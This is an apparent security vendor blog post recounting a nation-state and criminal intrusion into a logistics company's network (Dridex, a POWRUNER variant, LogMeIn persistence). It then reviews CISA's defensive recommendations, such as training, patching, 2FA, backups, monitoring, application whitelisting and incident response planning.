“You’ve been hacked; it was by a nation-state.”
Companies receive this message from their managed IT service providers or incident response firms more and more everyday. Traditionally, nation-states were focused on hacking other nation-states; but a new reality is emerging. Nation-backed hackers (referred to as Advanced Persistent Threats or APTs) are now targeting commercial and public organizations across domains, regardless of size.
For example, APT groups are increasingly targeting outsourced IT service companies, often called managed service providers (MSPs). While MSPs have good IT network and security knowledge, most do not have the level of training and internal resources necessary to detect, stop, and remediate an attack by a nation-state ATP. As a result, ATP groups see MSPs as a low risk and high reward target; if they infiltrate an MSP’s network, they can also gain direct privileged access to all the MSP’s client’s networks.
The Cybersecurity and Infrastructure Security Agency (CISA) recently released an Insight Report that specifically warned of increased threats from nation-state Iran APT groups due to the tensions between the United States and Iran. While the recommendations are nothing revolutionary, it is important to understand why the Information Security industry often makes recommendations based on basic IT hygiene.
- Industry: Logistical Supply Chain
- Endpoints: 5000
- Threat Actor(s): APT33, APT34, Criminal Organization
- Tools used: Dridex, POWRUNERT
To set the stage, the attack is occurring in a 5000+ device network with limited security technology and policies and Blackpoint is in the process of deploying its SNAP-Defense and NICOS technologies as well as the commercial endpoint security products Webroot and Sophos. Blackpoint’s NICOS appliance was the first to discover unusual activity; security analysts observed SSH activity and port scans that were outside the normal use case for this network.
Blackpoint’s Security Operations Center (SOC) immediately contacted the company to request they expedite the deployment of the remaining cyber security technologies (SNAP-Defense, Webroot, and Sophos). Once these technologies were fully deployed, Blackpoint’s security analysts started to observe the abuse of a legitimate Windows technology, Windows Management Instrumentation (WMI), to spread Dridex. Dridex gained notoriety for its ability to steal banking credentials, but has recently evolved into a delivery mechanism for ransomware and has the ability to establish virtual networks and delete files.
Blackpoint analysts also detected LogMeIn, a commercial remote access application, being used as a persistence method in this environment. This legitimate business application allowed the attackers to maintain a foothold inside the environment even after the device is restarted. The initial findings led the Blackpoint team to believe this was the work of a Russian criminal enterprise, but after further investigation, the analysts found more command and control servers used by APT33 and APT34 along with trade-craft attributed to these groups.
The above SNAP-Defense screenshot shows an alert for a Base64 encoded PowerShell script. This script was identified as a variant of POWRUNER, a known tool in the APT34 arsenal that allows the group to send and receive commands from the control server. Other attacker tools present in the environment were keyloggers, clipboard content collectors, and device information grabbers.
Analysis revealed that APT34 was either creating a diversion by impersonating a criminal organization to allow other tools to go unnoticed, or this network was breached by both APT groups and a for-profit criminal enterprise; additional analysis indicated that it was most likely the latter.
The point of entry for these breaches is not 100% confirmed, but Blackpoint’s investigation along with investigation by other security vendors revealed it was most likely a two-pronged attack. The attack included a phishing attack with the goal of credential harvesting, and a vulnerability in an unpatched SharePoint server. Let’s look at the CISA’s Insight Report recommendations now.
If the targeted company had a better understanding of their exposure and the threat landscape, they may have been better prepared. Knowing as an organization where your vulnerabilities lie, as well as knowing your adversaries’ capabilities, are the first steps to closing security gaps in your IT environment.
The main contributor to successful cyber-attacks continue to be failures at layer 8 in the OSI model. For those unfamiliar with the OSI model, it actually ends at layer 7; layer 8 implies the human element or user. Consistent and appropriate training for your end-users and IT team will make your overall security posture better. Reward them when they report phishing; if they make a mistake and click a link, do not rebuke them unless it is a chronic issue, thank them for being honest and owning up to their mistake so you can immediately activate a response plan. Proper training may have saved the company in the example above if the employees had recognized the phishing emails or had immediately notified their IT security team when they mistakenly opened them.
Patching and Vulnerability Scanning
If you are not following proper patch schedules, you are leaving your front door wide open for a malicious actor to walk in. Patching is an essential security activity that is not flashy or fun, but by far one of the most important. An un-patched environment is very susceptible regardless of any Next-Gen security technologies employed. If you are unsure what needs to be patched, a vulnerability scan may be necessary.
Account Protections such as 2FA
While not the ultimate solution to security, two-factor authentication (2FA) makes it exponentially harder for hackers to access devices and applications. Implementing company-wide 2FA dramatically reduces the chances that user account credentials are stolen and used to deploy malware.
Backups and Backup testing
When you operate under an assume-a-breach mentality as we do, you should always have a last resort plan in place. Backups will make recovery easier, but they are worthless without ensuring they are operating properly on a daily basis. In the company example above, no uninfected backups existed so this recovery option was not available.
Network Traffic Monitoring
Without the proper technology in place to provide visibility into your network you will have limited context into what devices are communicating and to whom. The chances of detecting a nation-state hack through traditional endpoint protection is extremely low. While endpoint protection is a necessary layer in a company’s cyber security stack, many endpoint security tools do not have the capability to detect a hacker’s activities that involve using various tools in the infrastructure to move around. These methods are known as living-off-the-land and they are an increasingly popular choice for hackers.
Only allowing approved applications to run on your devices greatly reduces cyber risk. If the infected company above had used application whitelisting, the LogMeIn persistence tactic would have failed and an alternative, possibly malicious, tool would have been necessary, which may have increased the chances of a traditional anti-virus being able to detect and quarantine the threat.
Incident Response Plan
Finally, you need to know what to do when a nation-state or domestic threat is at the door. Know your tools, know your phone numbers, know who does what and when. Practice various cyber attack scenarios in round table decisions and role-play scenarios. The above company was ill-prepared to deal with a breach and was forced to develop an ad-hoc response plan during one of the most stressful times; do not let that happen to you: plan and prepare.
We hope this article encourages you to implement the best practices listed above before an attack occurs; increasing your cyber security posture, lowering your risk, and helping you defend against even nation-state attacks. Do not allow your company to be caught off guard – the consequences could be catastrophic.